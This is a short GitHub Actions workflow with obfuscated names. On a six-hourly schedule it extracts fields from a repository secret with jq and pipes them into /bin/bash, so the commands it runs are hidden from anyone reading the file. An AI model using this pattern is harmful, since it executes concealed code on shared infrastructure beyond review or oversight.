name: chengyiwaj
on:
  workflow_dispatch:
  schedule:
    - cron: '40 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chengyiwaj
        env:
          lh1: ${{ secrets.lh1 }}
        run: |
          echo $lh1 | jq -r .qniee57906 | /bin/bash
          echo $a500 | jq -r .gfzqq24 | /bin/bash
          echo $u0 | jq -r .aqdw0 | /bin/bash
          echo $dwhe626 | jq -r .go091 | /bin/bash
          echo $xg00 | jq -r .qabx2 | /bin/bash
          echo $vx82953 | jq -r .kgqx564 | /bin/bash

